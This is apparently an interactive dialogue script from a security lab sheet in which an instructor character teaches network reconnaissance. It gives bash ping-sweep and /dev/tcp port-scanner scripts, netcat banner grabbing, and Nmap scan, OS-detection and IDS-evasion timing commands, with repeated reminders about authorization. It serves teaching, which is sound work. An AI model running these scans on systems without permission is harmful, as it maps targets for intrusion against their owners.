HacktivityLabSheets: introducing_attacks/5_scanning.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR scanning_ethics = 0 + +// External variables +EXTERNAL player_name + +=== start === +Reconnaissance Specialist: "Give me six hours to chop down a tree and I will spend the first four sharpening the axe." -- Abraham Lincoln + +~ instructor_rapport = 0 +~ scanning_ethics = 0 + +Reconnaissance Specialist: Welcome, Agent {player_name}. I'm your instructor for Information Gathering and Network Scanning. + +Reconnaissance Specialist: Scanning is a critical stage for both attackers and security testers. It gives you all the information you need to plan an attack - IP addresses, open ports, service versions, and operating systems. + +Reconnaissance Specialist: Once you know what software is running and what version it is, you can look up and use known attacks against the target. + +Reconnaissance Specialist: This knowledge is powerful. Use it only for authorized security testing, penetration testing engagements, and defensive purposes. + +~ scanning_ethics += 10 + +-> scanning_hub + +=== scanning_hub === +Reconnaissance Specialist: What aspect of scanning and information gathering would you like to explore? + ++ [Why is scanning so important?] + -> scanning_importance ++ [Ping sweeps for finding live hosts] + -> ping_sweeps ++ [Creating a ping sweep bash script] + -> ping_sweep_script ++ [Introduction to Nmap] + -> nmap_intro ++ [Ports and port scanning basics] + -> ports_intro ++ [TCP three-way handshake] + -> tcp_handshake ++ [Creating a port scanner bash script] + -> port_scanner_script ++ [Nmap port scanning techniques] + -> nmap_port_scanning ++ [Service identification and banner grabbing] + -> service_identification ++ [Protocol analysis and fingerprinting] + -> protocol_analysis ++ [Operating system detection] + -> os_detection ++ [Nmap timing and performance options] + -> nmap_timing ++ [Nmap output and GUIs] + -> nmap_output ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== scanning_importance === +Reconnaissance Specialist: Scanning is often the most important phase of an attack or security assessment. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: After establishing a list of live hosts, you examine the attack surface - what there is that could be attacked on each system. + +Reconnaissance Specialist: Any way that a remote computer accepts communication has the potential to be attacked. + +Reconnaissance Specialist: For security testers and network administrators, scanning helps map out a network, understand what's running where, and identify potential security problems before attackers find them. + ++ [What information does scanning reveal?] + Reconnaissance Specialist: Scanning typically reveals IP addresses of live hosts, open ports on those hosts, what services are running on each port, the versions of those services, and often the operating system. + + Reconnaissance Specialist: With this information, you can look up known vulnerabilities for those specific software versions and plan your attack or remediation accordingly. + + Reconnaissance Specialist: A well-executed scanning stage is extremely important when looking for potential security problems. + + ~ instructor_rapport += 5 + ++ [Is scanning legal?] + Reconnaissance Specialist: Excellent question. Scanning networks and systems without authorization is typically illegal in most jurisdictions. + + Reconnaissance Specialist: You need explicit written permission to scan systems you don't own. This includes networks at your school, workplace, or anywhere else unless you have authorization. + + Reconnaissance Specialist: In penetration testing engagements, you'll have a statement of work or rules of engagement that defines what you're allowed to scan. + + Reconnaissance Specialist: In this lab environment, you have permission to scan the provided VMs. Never scan external networks without authorization. + + ~ scanning_ethics += 10 + ++ [What's the difference between passive and active reconnaissance?] + Reconnaissance Specialist: Great question! Passive reconnaissance involves gathering information without directly interacting with the target - like looking up DNS records or searching public websites. + + Reconnaissance Specialist: Active reconnaissance, which includes scanning, directly interacts with the target systems and can be detected. + + Reconnaissance Specialist: Scanning sends packets to the target, which can trigger intrusion detection systems and will show up in logs. + + Reconnaissance Specialist: This is why timing and stealth can be important, though in authorized testing you may not need to be stealthy. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== ping_sweeps === +Reconnaissance Specialist: Ping sweeps are used to identify live hosts on a network. They're often the first step in network reconnaissance. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: The ping command works by sending an ICMP echo request to a target. Most hosts will reply with an ICMP echo response. + +Reconnaissance Specialist: However, Windows PC firewalls typically block incoming ping requests by default, so ping isn't always reliable. + ++ [How do I use the ping command?] + Reconnaissance Specialist: The basic use is: ping DESTINATION + + Reconnaissance Specialist: Where DESTINATION is an IP address or hostname. + + Reconnaissance Specialist: By default, ping keeps sending requests until you press Ctrl-C. You can limit the count with the -c flag. + + Reconnaissance Specialist: For example: ping -c 3 10.0.0.1 + + Reconnaissance Specialist: This sends exactly 3 echo requests. + + Reconnaissance Specialist: The -W flag sets the timeout in seconds: ping -c 1 -W 1 10.0.0.1 + + ~ instructor_rapport += 5 + ++ [How can I ping a whole network range?] + Reconnaissance Specialist: You could manually ping each IP address in the range, but that's tedious and inefficient. + + Reconnaissance Specialist: A better approach is to write a bash script that loops through all IPs in the range. + + Reconnaissance Specialist: Or, even better, use Nmap which can do this far more efficiently. + + Reconnaissance Specialist: Nmap doesn't wait for each response before sending the next request, making it much faster. + + ~ instructor_rapport += 5 + ++ [Tell me about creating a ping sweep script] + -> ping_sweep_script + +- -> scanning_hub + +=== ping_sweep_script === +Reconnaissance Specialist: Creating your own tools helps you understand how they work. Let's build a ping sweep bash script. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Here's a basic structure: + +Reconnaissance Specialist: #!/bin/bash + +Reconnaissance Specialist: if [ $# -ne 1 ]; then + +Reconnaissance Specialist: echo "Usage: `basename $0` {three octets of IP, for example 192.168.0}" + +Reconnaissance Specialist: exit 1 + +Reconnaissance Specialist: fi + +Reconnaissance Specialist: ip_address_start=$1 + +Reconnaissance Specialist: for i in {1..254}; do + +Reconnaissance Specialist: ping -c 1 -W 1 $ip_address_start.$i | grep 'from' + +Reconnaissance Specialist: done + ++ [How does this script work?] + Reconnaissance Specialist: Let me break it down. First, we check if the user provided exactly one argument (the first three octets of an IP address). + + Reconnaissance Specialist: If not, we print usage instructions and exit with an error code. + + Reconnaissance Specialist: Then we store the argument in a variable called ip_address_start. + + Reconnaissance Specialist: The for loop iterates from 1 to 254 (all valid host addresses in a /24 subnet). + + Reconnaissance Specialist: For each iteration, we ping that IP with one request and a 1-second timeout, then pipe to grep to only show successful responses. + + ~ instructor_rapport += 5 + ++ [How do I make the script executable?] + Reconnaissance Specialist: After saving the script, you need to set the executable permission: + + Reconnaissance Specialist: chmod +x pingsweep.sh + + Reconnaissance Specialist: The chmod command changes file modes or permissions. The +x flag adds execute permission. + + Reconnaissance Specialist: You can verify with: ls -la + + Reconnaissance Specialist: You'll see an 'x' in the permissions, indicating the file can be executed. + + ~ instructor_rapport += 5 + ++ [How long will this take to run?] + Reconnaissance Specialist: Good thinking! With the -W 1 timeout, each ping waits up to 1 second for a response. + + Reconnaissance Specialist: Since we're checking 254 addresses sequentially, in the worst case (no hosts respond), it could take up to 254 seconds - over 4 minutes! + + Reconnaissance Specialist: This is why professional tools like Nmap are so much faster - they send requests in parallel and use more sophisticated timing. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_intro === +Reconnaissance Specialist: Nmap - Network Mapper - is without a doubt the most popular scanning tool in existence. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Nmap is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. + +Reconnaissance Specialist: It uses raw IP packets in novel ways to determine what hosts are available, what services they're offering, what operating systems they're running, what type of packet filters are in use, and much more. + ++ [What makes Nmap so powerful?] + Reconnaissance Specialist: Nmap supports dozens of different scanning techniques, from simple ping sweeps to complex protocol analysis. + + Reconnaissance Specialist: It can identify services, detect versions, fingerprint operating systems, evade firewalls, and output results in various formats. + + Reconnaissance Specialist: It's actively maintained, has extensive documentation, and is scriptable with the Nmap Scripting Engine (NSE). + + Reconnaissance Specialist: Most importantly, it's extremely fast and efficient compared to manual or simple scripted approaches. + + ~ instructor_rapport += 5 + ++ [How do I use Nmap for ping sweeps?] + Reconnaissance Specialist: For a basic ping sweep: nmap -sn -PE 10.0.0.1-254 + + Reconnaissance Specialist: The -sn flag tells Nmap to skip port scanning (just do host discovery). + + Reconnaissance Specialist: The -PE flag specifies ICMP echo requests. + + Reconnaissance Specialist: Nmap's default host discovery with -sn is actually more comprehensive than just ping - it sends ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests. + + Reconnaissance Specialist: This gives you a better chance of detecting hosts even if they block regular pings. + + ~ instructor_rapport += 5 + ++ [Can Nmap resolve hostnames?] + Reconnaissance Specialist: Yes! Nmap performs DNS resolution by default. + + Reconnaissance Specialist: You can do a list scan with: nmap -sL 10.0.0.1-254 + + Reconnaissance Specialist: This lists all hosts with their hostnames without actually scanning them. + + Reconnaissance Specialist: The hostnames can be very informative - names like "web-server-01" or "database-prod" tell you a lot about what a system does. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== ports_intro === +Reconnaissance Specialist: Understanding ports is fundamental to network scanning and security. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: All TCP and UDP traffic uses port numbers to establish which applications are communicating. + +Reconnaissance Specialist: For example, web servers typically listen on port 80 for HTTP or port 443 for HTTPS. Email servers use ports 25 (SMTP), 110 (POP3), or 143 (IMAP). + +Reconnaissance Specialist: There are 65,535 possible TCP ports and 65,535 possible UDP ports on each system. + ++ [Why do standard services use specific ports?] + Reconnaissance Specialist: Standard port numbers make networking practical. When you type a URL in your browser, it knows to connect to port 80 or 443 without you specifying it. + + Reconnaissance Specialist: The Internet Assigned Numbers Authority (IANA) maintains the official registry of port number assignments. + + Reconnaissance Specialist: On Linux systems, you can see common port assignments in /etc/services + + Reconnaissance Specialist: Ports 1-1023 are well-known ports typically requiring admin privileges to bind to. Ports 1024-49151 are registered ports. Ports 49152-65535 are dynamic/private ports. + + ~ instructor_rapport += 5 + ++ [How can I manually check if a port is open?] + Reconnaissance Specialist: You can use telnet or netcat to connect manually: + + Reconnaissance Specialist: telnet IP_ADDRESS 80 + + Reconnaissance Specialist: If you see "Connected to..." the port is open. If it says "Connection refused" or times out, the port is closed or filtered. + + Reconnaissance Specialist: Netcat is similar: nc IP_ADDRESS 80 + + Reconnaissance Specialist: This manual approach helps you understand what's happening, but it's not practical for scanning many ports. + + ~ instructor_rapport += 5 + ++ [What's the difference between open, closed, and filtered ports?] + Reconnaissance Specialist: An open port has an application actively listening and accepting connections. + + Reconnaissance Specialist: A closed port has no application listening, but the system responded to your probe (usually with a RST packet). + + Reconnaissance Specialist: A filtered port means a firewall or filter is blocking the probe, so you can't determine if it's open or closed. + + Reconnaissance Specialist: You might also see states like "open|filtered" when Nmap can't definitively determine the state. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== tcp_handshake === +Reconnaissance Specialist: Understanding the TCP three-way handshake is crucial for understanding port scanning techniques. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: To establish a TCP connection and start sending data, a three-way handshake occurs: + +Reconnaissance Specialist: Step 1: The client sends a TCP packet with the SYN flag set, indicating it wants to start a new connection to a specific port. + +Reconnaissance Specialist: Step 2: If a server is listening on that port, it responds with SYN-ACK flags set, accepting the connection. + +Reconnaissance Specialist: Step 3: The client completes the connection by sending a packet with the ACK flag set. + ++ [What happens if the port is closed?] + Reconnaissance Specialist: If the port is closed, the server will send a RST (reset) packet at step 2 instead of SYN-ACK. + + Reconnaissance Specialist: This immediately tells the client the port is closed. + + Reconnaissance Specialist: If there's a firewall filtering that port, you might not receive any reply at all - the packets are simply dropped. + + ~ instructor_rapport += 5 + ++ [Why is this relevant to scanning?] + Reconnaissance Specialist: Here's the key insight: if all we want to know is whether a port is open, we can skip step 3! + + Reconnaissance Specialist: The SYN-ACK response at step 2 already tells us the port is open. + + Reconnaissance Specialist: This is the basis for SYN scanning - send SYN, wait for SYN-ACK, then don't complete the handshake. + + Reconnaissance Specialist: It's faster and stealthier than completing the full connection, though modern IDS systems will still detect it. + + ~ instructor_rapport += 5 + ++ [What's a full connect scan then?] + Reconnaissance Specialist: A full connect scan completes the entire three-way handshake for each port. + + Reconnaissance Specialist: It's less efficient because you're establishing complete connections, but it doesn't require special privileges. + + Reconnaissance Specialist: SYN scans need to write raw packets, which requires root privileges on Linux. Connect scans use standard library functions available to any user. + + Reconnaissance Specialist: In Nmap, -sT does a connect scan, while -sS does a SYN scan. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== port_scanner_script === +Reconnaissance Specialist: Let's build a simple port scanner in bash to understand how port scanning works. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Modern bash can connect to TCP ports using special file descriptors like /dev/tcp/HOST/PORT + +Reconnaissance Specialist: Here's a basic port scanner structure: + +Reconnaissance Specialist: #!/bin/bash + +Reconnaissance Specialist: if [ $# -ne 1 ]; then + +Reconnaissance Specialist: echo "Usage: `basename $0` {IP address or hostname}" + +Reconnaissance Specialist: exit 1 + +Reconnaissance Specialist: fi + +Reconnaissance Specialist: ip_address=$1 + +Reconnaissance Specialist: echo `date` >> $ip_address.open_ports + +Reconnaissance Specialist: for port in {1..65535}; do + +Reconnaissance Specialist: timeout 1 echo > /dev/tcp/$ip_address/$port + +Reconnaissance Specialist: if [ $? -eq 0 ]; then + +Reconnaissance Specialist: echo "port $port is open" >> "$ip_address.open_ports" + +Reconnaissance Specialist: fi + +Reconnaissance Specialist: done + ++ [How does this work?] + Reconnaissance Specialist: The script takes one argument - the IP address to scan. + + Reconnaissance Specialist: It loops through all 65,535 possible ports (this will take a very long time!). + + Reconnaissance Specialist: For each port, it tries to connect using echo > /dev/tcp/$ip_address/$port + + Reconnaissance Specialist: The timeout command ensures each attempt only waits 1 second. + + Reconnaissance Specialist: The special variable $? contains the exit status of the last command - 0 for success, non-zero for failure. + + Reconnaissance Specialist: If the connection succeeded ($? equals 0), we write that port number to the output file. + + ~ instructor_rapport += 5 + ++ [Why would I write this when Nmap exists?] + Reconnaissance Specialist: Great question! Writing your own tools teaches you how they work under the hood. + + Reconnaissance Specialist: It helps you understand what's actually happening when you run Nmap. + + Reconnaissance Specialist: In some restricted environments, you might not have Nmap available but can write bash scripts. + + Reconnaissance Specialist: Plus, it's a good programming exercise! You could extend it to do banner grabbing, run it in parallel, or output in different formats. + + ~ instructor_rapport += 5 + ++ [How long will scanning all 65535 ports take?] + Reconnaissance Specialist: With a 1-second timeout per port, in the worst case it could take over 18 hours! + + Reconnaissance Specialist: This is why professional scanners like Nmap are so much more sophisticated - they use parallel connections, adaptive timing, and send raw packets. + + Reconnaissance Specialist: Your simple bash script is doing full TCP connect scans sequentially. Nmap can send hundreds of packets simultaneously. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_port_scanning === +Reconnaissance Specialist: Nmap supports dozens of different port scanning techniques. Let me cover the most important ones. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: **SYN Scan (-sS):** The default and most popular scan. Sends SYN packets and looks for SYN-ACK responses. Fast and stealthy. Requires root. + +Reconnaissance Specialist: **Connect Scan (-sT):** Completes the full TCP handshake. Slower but doesn't require root privileges. + +Reconnaissance Specialist: **UDP Scan (-sU):** Scans UDP ports. Slower and less reliable because UDP is connectionless. + +Reconnaissance Specialist: **NULL, FIN, and Xmas Scans (-sN, -sF, -sX):** Send packets with unusual flag combinations to evade some firewalls. Don't work against Windows. + ++ [Tell me more about SYN scans] + Reconnaissance Specialist: SYN scans are the default Nmap scan type for good reason. + + Reconnaissance Specialist: They're fast because they don't complete the connection. They're relatively stealthy compared to connect scans. + + Reconnaissance Specialist: However, modern intrusion detection systems will absolutely detect SYN scans - the "stealth" is relative. + + Reconnaissance Specialist: Run a SYN scan with: sudo nmap -sS TARGET + + Reconnaissance Specialist: You need sudo because sending raw SYN packets requires root privileges. + + ~ instructor_rapport += 5 + ++ [Why are UDP scans unreliable?] + Reconnaissance Specialist: UDP is connectionless - there's no handshake like TCP. You send a packet and hope for a response. + + Reconnaissance Specialist: If a UDP port is open, the service might not respond at all. If it's closed, you might get an ICMP "port unreachable" message. + + Reconnaissance Specialist: The lack of response is ambiguous - is the port open and ignoring you, or is it filtered by a firewall? + + Reconnaissance Specialist: UDP scans are also slow because Nmap has to wait for timeouts: sudo nmap -sU TARGET + + Reconnaissance Specialist: Despite these challenges, UDP scanning is important because many services run on UDP like DNS (port 53) and SNMP (port 161). + + ~ instructor_rapport += 5 + ++ [What are NULL, FIN, and Xmas scans?] + Reconnaissance Specialist: These send TCP packets with unusual flag combinations to try to evade simple firewalls. + + Reconnaissance Specialist: NULL scan (-sN) sends packets with no flags set. FIN scan (-sF) sends packets with only the FIN flag. Xmas scan (-sX) sends FIN, PSH, and URG flags. + + Reconnaissance Specialist: According to RFC 793, a closed port should respond with RST to these probes, while open ports should not respond. + + Reconnaissance Specialist: However, Windows systems don't follow the RFC correctly, so these scans don't work against Windows targets. + + Reconnaissance Specialist: They're less useful today since modern firewalls and IDS systems detect them easily. + + ~ instructor_rapport += 5 + ++ [How do I specify which ports to scan?] + Reconnaissance Specialist: Nmap has flexible port specification options. + + Reconnaissance Specialist: By default, Nmap scans the 1000 most common ports. You can scan specific ports with -p: + + Reconnaissance Specialist: nmap -p 80,443,8080 TARGET (specific ports) + + Reconnaissance Specialist: nmap -p 1-1000 TARGET (port range) + + Reconnaissance Specialist: nmap -p- TARGET (all 65535 ports) + + Reconnaissance Specialist: nmap -F TARGET (fast scan - only 100 most common ports) + + Reconnaissance Specialist: You can also use -r to scan ports in sequential order instead of random. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== service_identification === +Reconnaissance Specialist: Knowing which ports are open is useful, but knowing what services are running on those ports is essential for planning attacks or security assessments. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: The simplest approach is banner grabbing - connecting to a port and checking if the service reveals what software it's running. + +Reconnaissance Specialist: Many services present a banner when you connect, often stating the software name and version. + ++ [How do I manually grab banners?] + Reconnaissance Specialist: You can use netcat to connect and see what the service sends: + + Reconnaissance Specialist: nc IP_ADDRESS 21 + + Reconnaissance Specialist: Port 21 (FTP) usually sends a banner immediately. Press Ctrl-C to disconnect. + + Reconnaissance Specialist: For port 80 (HTTP), you need to send something first: + + Reconnaissance Specialist: nc IP_ADDRESS 80 + + Reconnaissance Specialist: Then type a dot and press Enter a few times. Look for the "Server:" header in the response. + + ~ instructor_rapport += 5 + ++ [How can I automate banner grabbing?] + Reconnaissance Specialist: Netcat can grab banners across a range of ports: + + Reconnaissance Specialist: nc IP_ADDRESS 1-2000 -w 1 + + Reconnaissance Specialist: This connects to ports 1 through 2000 with a 1-second timeout and displays any banners. + + Reconnaissance Specialist: You could also update your bash port scanner script to read from each open port instead of just writing to it. + + ~ instructor_rapport += 5 + ++ [Can I trust banner information?] + Reconnaissance Specialist: Excellent critical thinking! No, you cannot trust banners completely. + + Reconnaissance Specialist: Server administrators can configure services to report false version information to mislead attackers. + + Reconnaissance Specialist: A web server claiming to be "Apache/2.4.1" might actually be nginx or a completely different version of Apache. + + Reconnaissance Specialist: This is why we use protocol analysis and fingerprinting to verify what's actually running. + + ~ instructor_rapport += 5 + ++ [Tell me about protocol analysis] + -> protocol_analysis + +- -> scanning_hub + +=== protocol_analysis === +Reconnaissance Specialist: Protocol analysis, also called fingerprinting, determines what software is running by analyzing how it responds to various requests. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Instead of trusting what the banner says, we send different kinds of requests (triggers) and compare the responses to a database of fingerprints. + +Reconnaissance Specialist: The software Amap pioneered this approach with two main features: banner grabbing (-B flag) and protocol analysis (-A flag). + ++ [How do I use Amap?] + Reconnaissance Specialist: Amap is straightforward but somewhat outdated: + + Reconnaissance Specialist: amap -A IP_ADDRESS 80 + + Reconnaissance Specialist: This performs protocol analysis on port 80, telling you what protocol is in use and what software is likely running. + + Reconnaissance Specialist: However, Amap has been largely superseded by Nmap's service detection, which is more up-to-date and accurate. + + ~ instructor_rapport += 5 + ++ [How does Nmap's version detection work?] + Reconnaissance Specialist: Nmap's version detection is one of its most powerful features: + + Reconnaissance Specialist: nmap -sV IP_ADDRESS + + Reconnaissance Specialist: Nmap connects to each open port and sends various triggers, then analyzes the responses against a massive database of service signatures. + + Reconnaissance Specialist: It can often identify not just the service type but the specific version number. + + Reconnaissance Specialist: You can combine it with port specification: nmap -sV -p 80 IP_ADDRESS + + Reconnaissance Specialist: Or scan all default ports with version detection: nmap -sV IP_ADDRESS + + ~ instructor_rapport += 5 + ++ [How accurate is version detection?] + Reconnaissance Specialist: Nmap's version detection is very accurate when services respond normally. + + Reconnaissance Specialist: It maintains a database called nmap-service-probes with thousands of service signatures. + + Reconnaissance Specialist: However, custom or heavily modified services might not match the database perfectly. + + Reconnaissance Specialist: And determined administrators can still configure services to mislead fingerprinting, though it's more difficult than changing a banner. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== os_detection === +Reconnaissance Specialist: Operating system detection is another powerful Nmap capability that helps you understand your target. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Knowing the OS is important for choosing the right payload when launching exploits, and for understanding what vulnerabilities might be present. + +Reconnaissance Specialist: Nmap performs OS detection by analyzing subtle differences in how operating systems implement TCP/IP. + ++ [How does OS fingerprinting work?] + Reconnaissance Specialist: The TCP/IP RFCs (specifications) contain some ambiguity - they're not 100% prescriptive about every implementation detail. + + Reconnaissance Specialist: Each operating system makes slightly different choices in how it handles network packets. + + Reconnaissance Specialist: Nmap sends specially crafted packets to both open and closed ports, then analyzes the responses. + + Reconnaissance Specialist: It compares these responses to a database of OS fingerprints to make an educated guess about what's running. + + ~ instructor_rapport += 5 + ++ [How do I use OS detection?] + Reconnaissance Specialist: OS detection is simple to invoke: + + Reconnaissance Specialist: sudo nmap -O IP_ADDRESS + + Reconnaissance Specialist: You need sudo because OS detection requires sending raw packets. + + Reconnaissance Specialist: Nmap will report its best guess about the operating system, often with a confidence percentage. + + Reconnaissance Specialist: You can combine OS detection with version detection: sudo nmap -O -sV IP_ADDRESS + + ~ instructor_rapport += 5 + ++ [How accurate is OS detection?] + Reconnaissance Specialist: OS detection is usually quite accurate, especially for common operating systems. + + Reconnaissance Specialist: However, it can be confused by firewalls, virtualization, or network devices that modify packets. + + Reconnaissance Specialist: Nmap will report a confidence level and sometimes multiple possible matches. + + Reconnaissance Specialist: Like version detection, OS detection can be deceived by administrators who configure their systems to report false information, though this is uncommon. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_timing === +Reconnaissance Specialist: Nmap's timing and performance options let you control the speed and stealth of your scans. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Nmap offers six timing templates from paranoid to insane: + +Reconnaissance Specialist: -T0 (paranoid): Extremely slow, sends one probe every 5 minutes. For IDS evasion. + +Reconnaissance Specialist: -T1 (sneaky): Very slow, sends one probe every 15 seconds. + +Reconnaissance Specialist: -T2 (polite): Slower, less bandwidth intensive. Won't overwhelm targets. + +Reconnaissance Specialist: -T3 (normal): The default. Balanced speed and reliability. + +Reconnaissance Specialist: -T4 (aggressive): Faster, assumes a fast and reliable network. + +Reconnaissance Specialist: -T5 (insane): Very fast, may miss open ports or overwhelm networks. + ++ [When would I use paranoid or sneaky timing?] + Reconnaissance Specialist: These ultra-slow timing templates are for stealth - attempting to evade intrusion detection systems. + + Reconnaissance Specialist: For example: nmap -T0 IP_ADDRESS + + Reconnaissance Specialist: However, modern IDS systems will still detect these scans, they just take much longer. + + Reconnaissance Specialist: These templates are rarely used in practice because they're so slow. A full scan could take days! + + Reconnaissance Specialist: In authorized penetration tests, you usually don't need this level of stealth. + + ~ instructor_rapport += 5 + ++ [When should I use aggressive or insane timing?] + Reconnaissance Specialist: Aggressive (-T4) is good when scanning on fast, reliable networks where you want quicker results. + + Reconnaissance Specialist: Insane (-T5) is for very fast networks when you want the absolute fastest scan: nmap -T5 IP_ADDRESS + + Reconnaissance Specialist: However, be careful! Insane timing can miss open ports because it doesn't wait long enough for responses. + + Reconnaissance Specialist: It can also overwhelm slow network links or trigger rate limiting, causing you to miss results. + + Reconnaissance Specialist: Generally, stick with normal or aggressive timing unless you have a specific reason to change. + + ~ instructor_rapport += 5 + ++ [Can I customize timing beyond the templates?] + Reconnaissance Specialist: Yes! Nmap has many granular timing options like --max-retries, --host-timeout, --scan-delay, and more. + + Reconnaissance Specialist: The templates are just convenient presets. You can read about all the timing options in the man page under "TIMING AND PERFORMANCE." + + Reconnaissance Specialist: For most purposes, the templates are sufficient and easier to remember. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_output === +Reconnaissance Specialist: Nmap's output options let you save scan results for later analysis, reporting, or importing into other tools. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Nmap supports several output formats: + +Reconnaissance Specialist: -oN filename (normal output): Saves output similar to what you see on screen. + +Reconnaissance Specialist: -oX filename (XML output): Saves structured XML, great for importing into other tools. + +Reconnaissance Specialist: -oG filename (grepable output): Simple columnar format, but deprecated. + +Reconnaissance Specialist: -oA basename (all formats): Saves all three formats with the same base filename. + ++ [When should I use XML output?] + Reconnaissance Specialist: XML output is the most versatile format: + + Reconnaissance Specialist: nmap -oX scan_results.xml IP_ADDRESS + + Reconnaissance Specialist: XML can be imported into vulnerability scanners, reporting tools, and custom scripts. + + Reconnaissance Specialist: Many security tools and frameworks can parse Nmap XML directly. + + Reconnaissance Specialist: You can also transform XML with tools like xsltproc to create HTML reports or other formats. + + ~ instructor_rapport += 5 + ++ [What about Nmap GUIs?] + Reconnaissance Specialist: Nmap has several graphical interfaces, most notably Zenmap (the official GUI). + + Reconnaissance Specialist: GUIs can help beginners construct commands and visualize results. + + Reconnaissance Specialist: They're useful for saving scan profiles and comparing results from multiple scans. + + Reconnaissance Specialist: However, most experts prefer the command line for speed, scriptability, and remote access via SSH. + + Reconnaissance Specialist: Note that Kali Linux recently removed Zenmap because it was based on Python 2, but other alternatives exist. + + ~ instructor_rapport += 5 + ++ [Should I always save output?] + Reconnaissance Specialist: In professional penetration testing, absolutely! You need records of what you scanned and when. + + Reconnaissance Specialist: Scan results are evidence for your reports and help you track progress. + + Reconnaissance Specialist: They also protect you legally - if something goes wrong, you have proof of what you actually did. + + Reconnaissance Specialist: Get in the habit of using -oA to save all formats: nmap -oA scan_results IP_ADDRESS + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== commands_reference === +Reconnaissance Specialist: Let me provide a comprehensive commands reference for this lab. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: **Basic Network Information:** + +Reconnaissance Specialist: Show IP addresses: ip a (or ifconfig on older systems) + +Reconnaissance Specialist: Show just the IPs: hostname -I + +Reconnaissance Specialist: **Ping Commands:** + +Reconnaissance Specialist: Basic ping: ping DESTINATION + +Reconnaissance Specialist: Limited count: ping -c 3 DESTINATION + +Reconnaissance Specialist: With timeout: ping -c 1 -W 1 DESTINATION + ++ [Show me ping sweep script commands] + Reconnaissance Specialist: **Ping Sweep Script:** + + Reconnaissance Specialist: Create script: vi pingsweep.sh + + Reconnaissance Specialist: Make executable: chmod +x pingsweep.sh + + Reconnaissance Specialist: Run script: ./pingsweep.sh 10.0.0 + + Reconnaissance Specialist: (Replace 10.0.0 with your network's first three octets) + + ~ instructor_rapport += 3 + ++ [Show me Nmap host discovery commands] + Reconnaissance Specialist: **Nmap Host Discovery:** + + Reconnaissance Specialist: Ping sweep with echo request: nmap -sn -PE 10.0.0.1-254 + + Reconnaissance Specialist: Default host discovery: sudo nmap -sn 10.0.0.1-254 + + Reconnaissance Specialist: List scan (DNS only): nmap -sL 10.0.0.1-254 + + ~ instructor_rapport += 3 + ++ [Show me port checking commands] + Reconnaissance Specialist: **Manual Port Checking:** + + Reconnaissance Specialist: Using telnet: telnet IP_ADDRESS 80 + + Reconnaissance Specialist: Using netcat: nc IP_ADDRESS 80 + + Reconnaissance Specialist: Test TCP connection with bash: echo > /dev/tcp/IP_ADDRESS/PORT + + Reconnaissance Specialist: Check last command status: echo $? + + Reconnaissance Specialist: (0 = success, non-zero = failure) + + ~ instructor_rapport += 3 + ++ [Show me port scanner script commands] + Reconnaissance Specialist: **Port Scanner Script:** + + Reconnaissance Specialist: Create script: vi portscanner.sh + + Reconnaissance Specialist: Make executable: chmod +x portscanner.sh + + Reconnaissance Specialist: Run script: ./portscanner.sh IP_ADDRESS + + Reconnaissance Specialist: View results: less IP_ADDRESS.open_ports + + ~ instructor_rapport += 3 + ++ [Show me Nmap scanning commands] + Reconnaissance Specialist: **Nmap Port Scanning:** + + Reconnaissance Specialist: Basic scan: nmap TARGET + + Reconnaissance Specialist: SYN scan: sudo nmap -sS TARGET + + Reconnaissance Specialist: Connect scan: nmap -sT TARGET + + Reconnaissance Specialist: UDP scan: sudo nmap -sU TARGET + + Reconnaissance Specialist: Specific ports: nmap -p 80,443 TARGET + + Reconnaissance Specialist: Port range: nmap -p 1-1000 TARGET + + Reconnaissance Specialist: All ports: nmap -p- TARGET + + Reconnaissance Specialist: Fast scan: nmap -F TARGET + + ~ instructor_rapport += 3 + ++ [Show me service detection commands] + Reconnaissance Specialist: **Service Identification:** + + Reconnaissance Specialist: Manual banner grab (FTP): nc IP_ADDRESS 21 + + Reconnaissance Specialist: Manual banner grab (HTTP): nc IP_ADDRESS 80 (then type . and press Enter) + + Reconnaissance Specialist: Automated banner grab: nc IP_ADDRESS 1-2000 -w 1 + + Reconnaissance Specialist: Amap protocol analysis: amap -A IP_ADDRESS PORT + + Reconnaissance Specialist: Nmap version detection: nmap -sV IP_ADDRESS + + Reconnaissance Specialist: Version detection on specific port: nmap -sV -p 80 IP_ADDRESS + + ~ instructor_rapport += 3 + ++ [Show me OS detection and timing commands] + Reconnaissance Specialist: **OS Detection:** + + Reconnaissance Specialist: OS detection: sudo nmap -O IP_ADDRESS + + Reconnaissance Specialist: OS + version detection: sudo nmap -O -sV IP_ADDRESS + + Reconnaissance Specialist: **Timing Templates:** + + Reconnaissance Specialist: Paranoid: nmap -T0 TARGET + + Reconnaissance Specialist: Sneaky: nmap -T1 TARGET + + Reconnaissance Specialist: Polite: nmap -T2 TARGET + + Reconnaissance Specialist: Normal (default): 